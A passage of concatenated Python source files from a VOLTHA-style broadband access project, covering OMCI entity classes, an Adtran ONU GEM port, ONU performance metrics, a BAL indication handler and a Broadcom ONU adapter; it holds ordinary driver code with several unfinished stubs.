ECA(ShortField("managed_entity_id", None), {AA.R, AA.SBC}),
]
mandatory_operations = {OP.Get}
class TwdmSystemProfile(EntityClass):
class_id = 65401
attributes = [
ECA(ShortField("managed_entity_id", None), {AA.R, AA.SBC}),
]
mandatory_operations = {OP.Get}
class TwdmChannel(EntityClass):
class_id = 65402
attributes = [
ECA(ShortField("managed_entity_id", None), {AA.R, AA.SBC}),
]
mandatory_operations = {OP.Get}
class WatchdogConfigData(EntityClass):
class_id = 65403
attributes = [
ECA(ShortField("managed_entity_id", None), {AA.R, AA.SBC}),
]
mandatory_operations = {OP.Get}
class FCPortalOrSraStat(EntityClass):
class_id = 65420
attributes = [
ECA(ShortField("managed_entity_id", None), {AA.R, AA.SBC}),
]
mandatory_operations = {OP.Get, OP.Set, OP.Create, OP.Delete}
class Onu3gOrInvStat2(EntityClass):
class_id = 65422
attributes = [
ECA(ShortField("managed_entity_id", None), {AA.R, AA.SBC}),
]
mandatory_operations = {OP.Set, OP.Get, OP.Create, OP.Delete}
#################################################################################
# entity class lookup table from entity_class values
_onu_entity_classes_name_map = dict(
inspect.getmembers(sys.modules[__name__],
lambda o: inspect.isclass(o) and
issubclass(o, EntityClass) and
o is not EntityClass)
)
onu_custom_entity_classes = [c for c in _onu_entity_classes_name_map.itervalues()]
def add_onu_me_entities(new_me_classes):
from voltha.extensions.omci.omci_entities import entity_classes, entity_id_to_class_map
for entity_class in new_me_classes:
assert entity_class.class_id not in entity_id_to_class_map, \
"Class ID '{}' already exists in the class map".format(entity_class.class_id)
entity_id_to_class_map[entity_class.class_id] = entity_class
entity_classes.extend(new_me_classes)
```
#### File: adapters/adtran_onu/onu_gem_port.py
```python
import structlog
from voltha.adapters.adtran_olt.xpon.gem_port import GemPort
from twisted.internet.defer import inlineCallbacks, returnValue, succeed
from omci.omci_me import GemPortNetworkCtpFrame
class OnuGemPort(GemPort):
"""
Adtran ONU specific implementation
"""
def __init__(self, gem_id, alloc_id,
encryption=False,
omci_transport=False,
multicast=False,
tcont_ref=None,
traffic_class=None,
intf_ref=None,
exception=False, # FIXED_ONU
name=None,
handler=None,
is_mock=False):
super(OnuGemPort, self).__init__(gem_id, alloc_id,
encryption=encryption,
omci_transport=omci_transport,
multicast=multicast,
tcont_ref=tcont_ref,
traffic_class=traffic_class,
intf_ref=intf_ref,
exception=exception,
name=name,
handler=handler)
self._is_mock = is_mock
self.log = structlog.get_logger(device_id=handler.device_id, gem_id=gem_id)
@property
def encryption(self):
return self._encryption
@encryption.setter
def encryption(self, value):
assert isinstance(value, bool), 'encryption is a boolean'
if self._encryption != value:
self._encryption = value
omci = None # TODO: Get from handler
@staticmethod
def create(handler, gem_port, is_mock=False):
return OnuGemPort(gem_port['gemport-id'],
None,
encryption=gem_port['encryption'], # aes_indicator,
tcont_ref=gem_port['tcont-ref'],
name=gem_port['name'],
traffic_class=gem_port['traffic-class'],
handler=handler,
is_mock=is_mock)
@inlineCallbacks
def add_to_hardware(self, omci):
if self._is_mock:
returnValue('mock')
omci = self._handler.omci
tcont = self.tcont
assert omci is not None, 'No OMCI engine'
assert tcont is not None, 'No TCONT'
assert tcont.entity_id == 0x8001, 'Hardcoded Entity ID NOT FOUND'
try:
direction = "downstream" if self.multicast else "bi-directional"
assert not self.multicast, 'MCAST is not supported yet'
# TODO: For TCONT ID, get the TCONT's entity ID that you programmed
# TODO: For TM, is this the entity ID for a traffic descriptor?
# results = yield omci.send_create_gem_port_network_ctp(self.gem_id, # Entity ID
# self.gem_id, # Port ID
# tcont.entity_id, # TCONT ID
# direction, # Direction
# 0x100) # TM
results = None
# results = yield omci.send(GemPortNetworkCtpFrame(self.gem_id, # Entity ID
# self.gem_id, # Port ID
# tcont.entity_id, # TCONT ID
# direction, # Direction
# 0x100).create() # TM
except Exception as e:
self.log.exception('gemport-create', e=e)
raise
try:
# GEM Interworking config
# TODO: For service mapper ID, always hardcoded or does it come from somewhere else
# It is probably the TCONT entity ID
results = None
# results = yield omci.send_create_gem_inteworking_tp(self.gem_id, # Entity ID
# self.gem_id, # GEMPort NET CTP ID
# tcont.entity_id) # Service Mapper Profile ID
except Exception as e:
self.log.exception('interworking-create', e=e)
raise
try:
# Mapper Service Profile config
# TODO: All p-bits currently go to the one and only GEMPORT ID for now
# TODO: The entity ID is probably the TCONT entity ID
results = None
# results = omci.send_set_8021p_mapper_service_profile(tcont.entity_id, # Entity ID
# self.gem_id) # Interworking TP ID
except Exception as e:
self.log.exception('mapper-set', e=e)
raise
returnValue(results)
@inlineCallbacks
def remove_from_hardware(self, omci):
if self._is_mock:
returnValue('mock')
omci = self._handler.omci
assert omci is not None, 'No OMCI engine'
results = succeed('TODO: Implement me')
# uri = AdtranOltHandler.GPON_GEM_CONFIG_URI.format(pon_id, onu_id, self.gem_id)
# name = 'gem-port-delete-{}-{}: {}'.format(pon_id, onu_id, self.gem_id)
# return session.request('DELETE', uri, name=name)
returnValue(results)
def set_config(self, omci, value, leaf):
if self._is_mock:
return
# from ..adtran_olt_handler import AdtranOltHandler
#
# data = json.dumps({leaf: value})
# uri = AdtranOltHandler.GPON_GEM_CONFIG_URI.format(self.pon_id,
# self.onu_id,
# self.gem_id)
# name = 'onu-set-config-{}-{}-{}'.format(self._pon_id, leaf, str(value))
# return session.request('PATCH', uri, data=data, name=name)
pass # TODO: Implement me
```
#### File: adapters/adtran_onu/onu_pm_metrics.py
```python
from voltha.protos.device_pb2 import PmConfig, PmConfigs, PmGroupConfig
from ..adtran_olt.pki.adapter_pm_metrics import AdapterPmMetrics
class OnuPmMetrics(AdapterPmMetrics):
def __init__(self, handler, device, grouped=False, freq_override=False):
super(OnuPmMetrics, self).__init__(handler, device,
grouped=grouped, freq_override=freq_override)
# PM Config Types are COUNTER, GUAGE, and STATE # Note: GAUGE is misspelled in device.proto
self.omci_pm_names = {
('enabled', PmConfig.STATE),
('tx_frames', PmConfig.COUNTER),
('tx_errors', PmConfig.COUNTER),
('rx_frames', PmConfig.COUNTER),
('rx_unknown_tid', PmConfig.COUNTER),
('rx_onu_frames', PmConfig.COUNTER), # Rx ONU autonomouse messages
('rx_alarm_overflow', PmConfig.COUNTER), # Autonomous ONU generated alarm message overflows
('rx_avc_overflow', PmConfig.COUNTER), # Autonomous ONU generated AVC message overflows
('rx_onu_discards', PmConfig.COUNTER), # Autonomous ONU message unknown type discards
('rx_timeouts', PmConfig.COUNTER),
('consecutive_errors', PmConfig.COUNTER),
('reply_min', PmConfig.GUAGE), # Milliseconds
('reply_max', PmConfig.GUAGE), # Milliseconds
('reply_average', PmConfig.GUAGE), # Milliseconds
}
self.health_pm_names = {
('enabled', PmConfig.STATE),
('alarm_active', PmConfig.STATE),
('heartbeat_count', PmConfig.COUNTER),
('heartbeat_miss', PmConfig.COUNTER),
('alarms_raised_count', PmConfig.COUNTER),
('heartbeat_failed_limit', PmConfig.COUNTER),
('heartbeat_interval', PmConfig.COUNTER),
}
# TODO Add PON Port PM
# TODO Add UNI Port PM
self.omci_metrics_config = {m: PmConfig(name=m, type=t, enabled=True)
for (m, t) in self.omci_pm_names}
self.health_metrics_config = {m: PmConfig(name=m, type=t, enabled=True)
for (m, t) in self.health_pm_names}
def update(self, pm_config):
# TODO: Test both 'group' and 'non-group' functionality
# TODO: Test frequency override capability for a particular group
if self.default_freq != pm_config.default_freq:
# Update the callback to the new frequency.
self.default_freq = pm_config.default_freq
self.lc.stop()
self.lc.start(interval=self.default_freq / 10)
if pm_config.grouped is True:
for m in pm_config.groups:
pass
# self.pm_group_metrics[m.group_name].config.enabled = m.enabled
# if m.enabled is True:,
('tx_errors', PmConfig.COUNTER),
('rx_frames', PmConfig.COUNTER),
# self.enable_pm_collection(m.group_name, remote)
# else:
# self.disable_pm_collection(m.group_name, remote)
else:
for m in pm_config.metrics:
self.omci_metrics_config[m.name].enabled = m.enabled
self.health_metrics_config[m.name].enabled = m.enabled
def make_proto(self):
pm_config = PmConfigs(id=self.id, default_freq=self.default_freq,
grouped=self.grouped,
freq_override=self.freq_override)
metrics = set()
if self.grouped:
pm_omci_stats = PmGroupConfig(group_name='OMCI',
group_freq=self.default_freq,
enabled=True)
pm_health_stats = PmGroupConfig(group_name='Heartbeat',
group_freq=self.default_freq,
enabled=True)
# TODO Add PON Port PM
# TODO Add UNI Port PM
else:
pm_omci_stats = pm_config
pm_health_stats = pm_config
# TODO Add PON Port PM
# TODO Add UNI Port PM
for m in sorted(self.omci_metrics_config):
pm = self.omci_metrics_config[m]
if not self.grouped:
if pm.name in metrics:
continue
metrics.add(pm.name)
pm_omci_stats.metrics.extend([PmConfig(name=pm.name,
type=pm.type,
enabled=pm.enabled)])
for m in sorted(self.health_metrics_config):
pm = self.health_metrics_config[m]
if not self.grouped:
if pm.name in metrics:
continue
metrics.add(pm.name)
pm_health_stats.metrics.extend([PmConfig(name=pm.name,
type=pm.type,
enabled=pm.enabled)])
return pm_config
def collect_port_metrics(self):
metrics = dict()
metrics['omci'] = self.collect_metrics(self.handler.omci,
self.omci_pm_names,
self.omci_metrics_config)
metrics['heartbeat'] = self.collect_metrics(self.handler.heartbeat,
self.health_pm_names,
self.health_metrics_config)
# TODO Add PON Port PM
# TODO Add UNI Port PM
return metrics
```
#### File: adapters/asfvolt16_olt/asfvolt16_ind_handler.py
```python
from twisted.internet import reactor
from common.utils.grpc_utils import twisted_async
from voltha.adapters.asfvolt16_olt.protos import bal_indications_pb2
from voltha.adapters.asfvolt16_olt.protos import bal_model_types_pb2, \
bal_errno_pb2, bal_pb2, bal_model_ids_pb2
from voltha.adapters.asfvolt16_olt.grpc_server import GrpcServer
class Asfvolt16IndHandler(object):
def __init__(self, log):
self.log = log
def bal_acc_term_oper_sta_cng_ind(self, indication, device_handler):
ind_info = dict()
ind_info['_object_type'] = 'access_terminal_indication'
ind_info['_sub_group_type'] = 'oper_state_change'
bal_err = bal_pb2.BalErr()
return bal_err
def bal_acc_term_ind(self, indication, device_handler):
# ind_info: {'_object_type': <str>
# 'actv_status': <str>}
ind_info = dict()
ind_info['_object_type'] = 'access_terminal_indication'
ind_info['_sub_group_type'] = 'access_terminal_indication'
if ((indication.access_term_ind.data.admin_state == \
bal_model_types_pb2.BAL_STATE_UP) and \
(indication.access_term_ind.data.oper_status == \
bal_model_types_pb2.BAL_STATUS_UP)):
ind_info['activation_successful'] = True
else:
ind_info['activation_successful'] = False
reactor.callLater(0,
device_handler.handle_access_term_ind,
ind_info,
indication.access_term_ind.key.access_term_id)
bal_err = bal_pb2.BalErr()
bal_err.err = bal_errno_pb2.BAL_ERR_OK
return bal_err
def bal_flow_oper_sts_cng(self, indication, device_handler):
ind_info = dict()
ind_info['_object_type'] = 'flow_indication'
ind_info['_sub_group_type'] = 'oper_state_change'
ind_info['_object_type'] = indication.objType
ind_info['_sub_group_type'] = indication.sub_group
bal_err = bal_pb2.BalErr()
bal_err.err = bal_errno_pb2.BAL_ERR_OK
return bal_err
def bal_flow_ind(self, indication, device_handler):
ind_info = dict()
ind_info['_object_type'] = 'flow_indication'
ind_info['_sub_group_type'] = 'flow_indication'
bal_err = bal_pb2.BalErr()
bal_err.err = bal_errno_pb2.BAL_ERR_OK
return bal_err
def bal_group_ind(self, indication, device_handler):
ind_info = dict()
ind_info['_object_type'] = 'group_indication'
ind_info['_sub_group_type'] = 'group_indication'
bal_err = bal_pb2.BalErr()
bal_err.err = bal_errno_pb2.BAL_ERR_OK
return bal_err
def bal_iface_oper_sts_cng(self, indication, device_handler):
ind_info = dict()
ind_info['_object_type'] = 'interface_indication'
ind_info['_sub_group_type'] = 'oper_state_change'
bal_err = bal_pb2.BalErr()
bal_err.err = bal_errno_pb2.BAL_ERR_OK
return bal_err
def bal_iface_los(self, indication, device_handler):
los_status = indication.interface_los.data.status
if los_status != bal_model_types_pb2.BAL_ALARM_STATUS_NO__CHANGE:
balIfaceLos_dict = {}
balIfaceLos_dict["los_status"] = los_status.__str__()
reactor.callLater(0, \
device_handler.BalIfaceLosAlarm, \
indication.device_id, \
indication.interface_los.key.intf_id, \
los_status, balIfaceLos_dict)
bal_err = bal_pb2.BalErr()
bal_err.err = bal_errno_pb2.BAL_ERR_OK
return bal_err
def bal_iface_ind(self, indication, device_handler):
self.log.info('Awaiting-ONU-discovery')
reactor.callLater(0,\
device_handler.BalIfaceIndication,\
indication.device_id.decode('unicode-escape'),\
indication.interface_ind.key.intf_id)
bal_err = bal_pb2.BalErr()
bal_err.err = bal_errno_pb2.BAL_ERR_OK
return bal_err
def bal_iface_stat(self, indication, device_handler):
ind_info = dict()
ind_info['_object_type'] = 'interface_indication'
ind_info['_sub_group_type'] = 'stat_indication'
bal_err = bal_pb2.BalErr()
bal_err.err = bal_errno_pb2.BAL_ERR_OK
return bal_err
def bal_subs_term_oper_sts_cng(self, indication, device_handler):
ind_info = dict()
ind_info['_object_type'] = 'sub_term_indication'
ind_info['_sub_group_type'] = 'oper_state_change'
bal_err = bal_pb2.BalErr()
bal_err.err = bal_errno_pb2.BAL_ERR_OK
return bal_err
def bal_subs_term_discovery_ind(self, indication, device_handler):
# ind_info: {'object_type': <int>
# '_sub_group_type': <str>
# '_device_id': <str>
# '_pon_id' : <int>
# 'onu_id' : <int>
# '_vendor_id' : <str>
# '__vendor_specific' : <str>
# 'activation_successful':[True or False]}
onu_data = indication.terminal_disc
ind_info = dict()
ind_info['_object_type'] = 'sub_term_indication'
ind_info['_sub_group_type'] = 'onu_discovery'
ind_info['_pon_id'] = onu_data.key.intf_id
ind_info['onu_id'] = onu_data.key.sub_term_id
ind_info['_vendor_id'] = onu_data.data.serial_number.vendor_id
ind_info['_vendor_specific'] = \
onu_data.data.serial_number.vendor_specific
reactor.callLater(0,
device_handler.handle_sub_term_ind,
ind_info)
bal_err = bal_pb2.BalErr()
bal_err.err = bal_errno_pb2.BAL_ERR_OK
return bal_err
def bal_subs_term_alarm_ind(self, indication, device_handler):
# Loss of signal
los = indication.terminal_alarm.data.alarm.los
# Loss of busrt
lob = indication.terminal_alarm.data.alarm.lob
# Loss of PLOAM miss channel
lopc_miss = indication.terminal_alarm.data.alarm.lopc_miss
# Loss of PLOAM channel
lopc_mic_error = indication.terminal_alarm.data.alarm.lopc_mic_error
balSubTermAlarm_Dict = {}
balSubTermAlarm_Dict["LOS Status"] = los.__str__()
balSubTermAlarm_Dict["LOB Status"] = lob.__str__()
balSubTermAlarm_Dict["LOPC MISS Status"] = lopc_miss.__str__()
balSubTermAlarm_Dict["LOPC MIC ERROR Status"] = lopc_mic_error.__str__()
if los != bal_model_types_pb2.BAL_ALARM_STATUS_NO__CHANGE:
reactor.callLater(0, device_handler.BalSubsTermLosAlarm, \
indication.device_id, \
indication.terminal_alarm.key.intf_id, \
los, balSubTermAlarm_Dict)
if lob != bal_model_types_pb2.BAL_ALARM_STATUS_NO__CHANGE:
reactor.callLater(0, device_handler.BalSubsTermLobAlarm, \
indication.device_id, \
indication.terminal_alarm.key.intf_id, \
lob, balSubTermAlarm_Dict)
if lopc_miss != bal_model_types_pb2.BAL_ALARM_STATUS_NO__CHANGE:
reactor.callLater(0, device_handler.BalSubsTermLopcMissAlarm, \
indication.device_id, \
indication.terminal_alarm.key.intf_id, \
lopc_miss, balSubTermAlarm_Dict)
if lopc_mic_error != bal_model_types_pb2.BAL_ALARM_STATUS_NO__CHANGE:
reactor.callLater(0, device_handler.BalSubsTermLopcMicErrorAlarm, \
indication.device_id, \
indication.terminal_alarm.key.intf_id, \
lopc_mic_error, balSubTermAlarm_Dict)
bal_err = bal_pb2.BalErr()
bal_err.err = bal_errno_pb2.BAL_ERR_OK
return bal_err
def bal_subs_term_dgi_ind(self, indication, device_handler):
# ind_info: {'_object_type': <str>
# '_device_id': <str>
# '_pon_id' : <int>
# 'onu_id' : <int>
# '_vendor_id' : <str>
# '__vendor_specific' : <str>
# 'activation_successful':[True or False]}
dgi_status = indication.terminal_dgi.data.dgi_status
if dgi_status != bal_model_types_pb2.BAL_ALARM_STATUS_NO__CHANGE:
ind_info = dict()
ind_info['_object_type'] = 'sub_term_indication'
ind_info['_sub_group_type'] = 'dgi_indication'
balSubTermDgi_Dict = {}
balSubTermDgi_Dict["dgi_status"] = dgi_status.__str__()
reactor.callLater(0,
device_handler.BalSubsTermDgiAlarm, \
indication.device_id, \
indication.terminal_dgi.key.intf_id,\
indication.terminal_dgi.key.sub_term_id, \
dgi_status,balSubTermDgi_Dict, ind_info)
bal_err = bal_pb2.BalErr()
bal_err.err = bal_errno_pb2.BAL_ERR_OK
return bal_err
def bal_subs_term_ind(self, indication, device_handler):
# ind_info: {'_object_type': <str>
# '_sub_group_type': <str>
# '_device_id': <str>
# '_pon_id' : <int>
# 'onu_id' : <int>
# '_vendor_id' : <str>
# '__vendor_specific' : <str>
# 'activation_successful':[True or False]}
onu_data = indication.terminal_ind
ind_info = dict()
ind_info['_object_type'] = 'sub_term_indication'
ind_info['_sub_group_type'] = 'sub_term_indication'
ind_info['_pon_id'] = onu_data.key.intf_id
ind_info['onu_id'] = onu_data.key.sub_term_id
ind_info['_vendor_id'] = onu_data.data.serial_number.vendor_id
ind_info['_vendor_specific'] = \
onu_data.data.serial_number.vendor_specific
self.log.info('registration-id-in-bal-subs-term-ind-is',\
registration_id=onu_data.data.registration_id[:36])
ind_info['registration_id'] = onu_data.data.registration_id[:36]
ind_info['activation_successful'] = None
if (bal_model_types_pb2.BAL_STATE_DOWN == onu_data.data.admin_state or
bal_model_types_pb2.BAL_STATUS_UP != onu_data.data.oper_status):
ind_info['activation_successful'] = False
elif (bal_model_types_pb2.BAL_STATE_UP == onu_data.data.admin_state and
bal_model_types_pb2.BAL_STATUS_UP == onu_data.data.oper_status):
ind_info['activation_successful'] = True
reactor.callLater(0,
device_handler.handle_sub_term_ind,
ind_info)
bal_err = bal_pb2.BalErr()
bal_err.err = bal_errno_pb2.BAL_ERR_OK
return bal_err
def bal_tm_queue_ind_info(self, indication, device_handler):
ind_info = dict()
ind_info['_object_type'] = 'tm_q_indication'
ind_info['_sub_group_type'] = 'tm_q_indication'
bal_err = bal_pb2.BalErr()
bal_err.err = bal_errno_pb2.BAL_ERR_OK
return bal_err
def bal_tm_sched_ind_info(self, indication, device_handler):
ind_info = dict()
ind_info['_object_type'] = 'tm_sched_indication'
ind_info['_sub_group_type'] = 'tm_sched_indication'
bal_err = bal_pb2.BalErr()
bal_err.err = bal_errno_pb2.BAL_ERR_OK
return bal_err
def bal_pkt_bearer_channel_rx_ind(self, indication, device_handler):
ind_info = dict()
ind_info['flow_id'] = indication.pktData.data.flow_id
ind_info['flow_type'] = indication.pktData.data.flow_type
ind_info['intf_id'] = indication.pktData.data.intf_id
ind_info['intf_type'] = indication.pktData.data.intf_type
ind_info['svc_port'] = indication.pktData.data.svc_port
ind_info['flow_cookie'] = indication.pktData.data.flow_cookie
ind_info['packet'] = indication.pktData.data.pkt
reactor.callLater(0,
device_handler.handle_packet_in,
ind_info)
bal_err = bal_pb2.BalErr()
bal_err.err = bal_errno_pb2.BAL_ERR_OK
return bal_err
def bal_pkt_omci_channel_rx_ind(self, indication, device_handler):
ind_info = dict()
ind_info['_object_type'] = 'packet_in_indication'
ind_info['_sub_group_type'] = 'omci_message'
packet_data = indication.balOmciResp.key.packet_send_dest
ind_info['onu_id'] = packet_data.itu_omci_channel.sub_term_id
ind_info['packet'] = indication.balOmciResp.data.pkt
self.log.info('ONU-Id-is',
onu_id=packet_data.itu_omci_channel.sub_term_id)
reactor.callLater(0,
device_handler.handle_omci_ind,
ind_info)
bal_err = bal_pb2.BalErr()
bal_err.err = bal_errno_pb2.BAL_ERR_OK
return bal_err
def bal_pkt_ieee_oam_channel_rx_ind(self, indication, device_handler):
ind_info = dict()
ind_info['_object_type'] = 'packet_in_indication'
ind_info['_sub_group_type'] = 'ieee_oam_message'
bal_err = bal_pb2.BalErr()
bal_err.err = bal_errno_pb2.BAL_ERR_OK
return bal_err
def handle_indication_from_bal(self, bal_ind, device_handler):
indication_handler = self.indication_handler_map.get((bal_ind.objType,
bal_ind.sub_group),
None)
if indication_handler is None:
self.log.debug('No handler', objType=bal_ind.objType,
sub_group=bal_ind.sub_group)
pass # no-op
else:
indication_handler(self, bal_ind, device_handler)
indication_handler_map = {
(bal_model_ids_pb2.BAL_OBJ_ID_ACCESS_TERMINAL,
bal_model_ids_pb2.BAL_ACCESS_TERMINAL_AUTO_ID_IND):
bal_acc_term_ind,
(bal_model_ids_pb2.BAL_OBJ_ID_ACCESS_TERMINAL,
bal_model_ids_pb2.BAL_ACCESS_TERMINAL_AUTO_ID_OPER_STATUS_CHANGE):
bal_acc_term_oper_sta_cng_ind,
(bal_model_ids_pb2.BAL_OBJ_ID_FLOW,
bal_model_ids_pb2.BAL_FLOW_AUTO_ID_OPER_STATUS_CHANGE):
bal_flow_oper_sts_cng,
(bal_model_ids_pb2.BAL_OBJ_ID_FLOW,
bal_model_ids_pb2.BAL_FLOW_AUTO_ID_IND):
bal_flow_ind,
(bal_model_ids_pb2.BAL_OBJ_ID_GROUP,
bal_model_ids_pb2.BAL_GROUP_AUTO_ID_IND):
bal_group_ind,
(bal_model_ids_pb2.BAL_OBJ_ID_INTERFACE,
bal_model_ids_pb2.BAL_INTERFACE_AUTO_ID_IND):
bal_iface_ind,
(bal_model_ids_pb2.BAL_OBJ_ID_INTERFACE,
bal_model_ids_pb2.BAL_INTERFACE_AUTO_ID_LOS):
bal_iface_los,
(bal_model_ids_pb2.BAL_OBJ_ID_INTERFACE,
bal_model_ids_pb2.BAL_INTERFACE_AUTO_ID_OPER_STATUS_CHANGE):
bal_iface_oper_sts_cng,
(bal_model_ids_pb2.BAL_OBJ_ID_SUBSCRIBER_TERMINAL,
bal_model_ids_pb2.\
BAL_SUBSCRIBER_TERMINAL_AUTO_ID_OPER_STATUS_CHANGE):
bal_subs_term_oper_sts_cng,
(bal_model_ids_pb2.BAL_OBJ_ID_SUBSCRIBER_TERMINAL,
bal_model_ids_pb2.\
BAL_SUBSCRIBER_TERMINAL_AUTO_ID_SUB_TERM_DISC):
bal_subs_term_discovery_ind,
(bal_model_ids_pb2.BAL_OBJ_ID_SUBSCRIBER_TERMINAL,
bal_model_ids_pb2.\
BAL_SUBSCRIBER_TERMINAL_AUTO_ID_SUB_TERM_ALARM):
bal_subs_term_alarm_ind,
(bal_model_ids_pb2.BAL_OBJ_ID_SUBSCRIBER_TERMINAL,
bal_model_ids_pb2.\
BAL_SUBSCRIBER_TERMINAL_AUTO_ID_DGI):
bal_subs_term_dgi_ind,
(bal_model_ids_pb2.BAL_OBJ_ID_SUBSCRIBER_TERMINAL,
bal_model_ids_pb2.\
BAL_SUBSCRIBER_TERMINAL_AUTO_ID_IND):
bal_subs_term_ind,
(bal_model_ids_pb2.BAL_OBJ_ID_TM_QUEUE,
bal_model_ids_pb2.BAL_TM_QUEUE_AUTO_ID_IND):
bal_tm_queue_ind_info,
(bal_model_ids_pb2.BAL_OBJ_ID_TM_SCHED,
bal_model_ids_pb2.BAL_TM_SCHED_AUTO_ID_IND):
bal_tm_sched_ind_info,
(bal_model_ids_pb2.BAL_OBJ_ID_PACKET,
bal_model_ids_pb2.BAL_PACKET_AUTO_ID_BEARER_CHANNEL_RX):
bal_pkt_bearer_channel_rx_ind,
(bal_model_ids_pb2.BAL_OBJ_ID_PACKET,
bal_model_ids_pb2.BAL_PACKET_AUTO_ID_ITU_OMCI_CHANNEL_RX):
bal_pkt_omci_channel_rx_ind,
(bal_model_ids_pb2.BAL_OBJ_ID_PACKET,
bal_model_ids_pb2.BAL_PACKET_AUTO_ID_IEEE_OAM_CHANNEL_RX):
bal_pkt_ieee_oam_channel_rx_ind,
}
```
#### File: adapters/broadcom_onu/broadcom_onu.py
```python
from uuid import uuid4
import structlog
from twisted.internet import reactor, task
from twisted.internet.defer import DeferredQueue, inlineCallbacks, returnValue
from zope.interface import implementer
from voltha.adapters.interface import IAdapterInterface
from voltha.core.logical_device_agent import mac_str_to_tuple
import voltha.core.flow_decomposer as fd
from voltha.protos import third_party
from voltha.protos.adapter_pb2 import Adapter
from voltha.protos.adapter_pb2 import AdapterConfig
from voltha.protos.common_pb2 import LogLevel, OperStatus, ConnectStatus, \
AdminState
from voltha.protos.device_pb2 import DeviceType, DeviceTypes, Port, Image
from voltha.protos.health_pb2 import HealthStatus
from voltha.protos.logical_device_pb2 import LogicalPort
from voltha.protos.openflow_13_pb2 import OFPPS_LIVE, OFPPF_FIBER, OFPPF_1GB_FD, OFPPS_LINK_DOWN
from voltha.protos.openflow_13_pb2 import OFPXMC_OPENFLOW_BASIC, ofp_port
from voltha.protos.bbf_fiber_base_pb2 import VEnetConfig, VOntaniConfig
from voltha.protos.bbf_fiber_traffic_descriptor_profile_body_pb2 import \
TrafficDescriptorProfileData
from voltha.protos.bbf_fiber_tcont_body_pb2 import TcontsConfigData
from voltha.protos.bbf_fiber_gemport_body_pb2 import GemportsConfigData
from common.frameio.frameio import hexify
from voltha.extensions.omci.omci import *
_ = third_party
log = structlog.get_logger()
BRDCM_DEFAULT_VLAN = 4091
ADMIN_STATE_LOCK = 1
ADMIN_STATE_UNLOCK = 0
@implementer(IAdapterInterface)
class BroadcomOnuAdapter(object):
name = 'broadcom_onu'
supported_device_types = [
DeviceType(
id=name,
vendor_id='BRCM',
adapter=name,
accepts_bulk_flow_update=True
)
]
def __init__(self, adapter_agent, config):
self.adapter_agent = adapter_agent
self.config = config
self.descriptor = Adapter(
id=self.name,
vendor='Voltha project',
version='0.44',
config=AdapterConfig(log_level=LogLevel.INFO)
)
self.devices_handlers = dict() # device_id -> BroadcomOnuHandler()
# register for adapter messages
self.adapter_agent.register_for_inter_adapter_messages()
def start(self):
log.debug('starting')
log.info('started')
def stop(self):
log.debug('stopping')
log.info('stopped')
def adapter_descriptor(self):
return self.descriptor
def device_types(self):
return DeviceTypes(items=self.supported_device_types)
def health(self):
return HealthStatus(state=HealthStatus.HealthState.HEALTHY)
def change_master_state(self, master):
raise NotImplementedError()
def adopt_device(self, device):
log.info('adopt_device', device_id=device.id)
self.devices_handlers[device.id] = BroadcomOnuHandler(self, device.id)
reactor.callLater(0, self.devices_handlers[device.id].activate, device)
return device
def reconcile_device(self, device):
log.info('reconcile-device', device_id=device.id)
self.devices_handlers[device.id] = BroadcomOnuHandler(self, device.id)
reactor.callLater(0, self.devices_handlers[device.id].reconcile, device)
def abandon_device(self, device):
raise NotImplementedError()
def disable_device(self, device):
log.info('disable-onu-device', device_id=device.id)
if device.id in self.devices_handlers:
handler = self.devices_handlers[device.id]
if handler is not None:
handler.disable(device)
def reenable_device(self, device):
log.info('reenable-onu-device', device_id=device.id)
if device.id in self.devices_handlers:
handler = self.devices_handlers[device.id]
if handler is not None:
handler.reenable(device)
def reboot_device(self, device):
log.info('reboot-device', device_id=device.id)
if device.id in self.devices_handlers:
handler = self.devices_handlers[device.id]
if handler is not None:
handler.reboot()
def download_image(self, device, request):
raise NotImplementedError()
def get_image_download_status(self, device, request):
raise NotImplementedError()
def cancel_image_download(self, device, request):
raise NotImplementedError()
def activate_image_update(self, device, request):
raise NotImplementedError()
def revert_image_update(self, device, request):
raise NotImplementedError()
def self_test_device(self, device):
"""
This is called to Self a device based on a NBI call.
:param device: A Voltha.Device object.
:return: Will return result of self test
"""
log.info('self-test-device', device=device.id)
raise NotImplementedError()
def delete_device(self, device):
log.info('delete-device', device_id=device.id)
if device.id in self.devices_handlers:
handler = self.devices_handlers[device.id]
if handler is not None:
handler.delete(device)
del self.devices_handlers[device.id]
return
def get_device_details(self, device):
raise NotImplementedError()
def update_pm_config(self, device, pm_configs):
raise NotImplementedError()
def update_flows_bulk(self, device, flows, groups):
'''
log.info('bulk-flow-update', device_id=device.id,
flows=flows, groups=groups)
'''
assert len(groups.items) == 0
handler = self.devices_handlers[device.id]
return handler.update_flow_table(device, flows.items)
def update_flows_incrementally(self, device, flow_changes, group_changes):
raise NotImplementedError()
def send_proxied_message(self, proxy_address, msg):
log.info('send-proxied-message', proxy_address=proxy_address, msg=msg)
def receive_proxied_message(self, proxy_address, msg):
log.info('receive-proxied-message', proxy_address=proxy_address,
device_id=proxy_address.device_id, msg=hexify(msg))
# Device_id from the proxy_address is the olt device id. We need to
# get the onu device id using the port number in the proxy_address
device = self.adapter_agent. \
get_child_device_with_proxy_address(proxy_address)
if device:
handler = self.devices_handlers[device.id]
handler.receive_message(msg)
def receive_packet_out(self, logical_device_id, egress_port_no, msg):
log.info('packet-out', logical_device_id=logical_device_id,
egress_port_no=egress_port_no, msg_len=len(msg))
def receive_inter_adapter_message(self, msg):
log.info('receive_inter_adapter_message', msg=msg)
proxy_address = msg['proxy_address']
assert proxy_address is not None
# Device_id from the proxy_address is the olt device id. We need to
# get the onu device id using the port number in the proxy_address
device = self.adapter_agent. \
get_child_device_with_proxy_address(proxy_address)
if device:
handler = self.devices_handlers[device.id]
handler.event_messages.put(msg)
else:
log.error("device-not-found")
def create_interface(self, device, data):
log.info('create-interface', device_id=device.id)
if device.id in self.devices_handlers:
handler = self.devices_handlers[device.id]
if handler is not None:
handler.create_interface(data)
def update_interface(self, device, data):
log.info('update-interface', device_id=device.id)
if device.id in self.devices_handlers:
handler = self.devices_handlers[device.id]
if handler is not None:
handler.update_interface(data)
def remove_interface(self, device, data):
log.info('remove-interface', device_id=device.id)
if device.id in self.devices_handlers:
handler = self.devices_handlers[device.id]
if handler is not None:
handler.remove_interface(data)
def receive_onu_detect_state(self, device_id, state):
raise NotImplementedError()
def create_tcont(self, device, tcont_data, traffic_descriptor_data):
log.info('create-tcont', device_id=device.id)
if device.id in self.devices_handlers:
handler = self.devices_handlers[device.id]
if handler is not None:
handler.create_tcont(tcont_data, traffic_descriptor_data)
def update_tcont(self, device, tcont_data, traffic_descriptor_data):
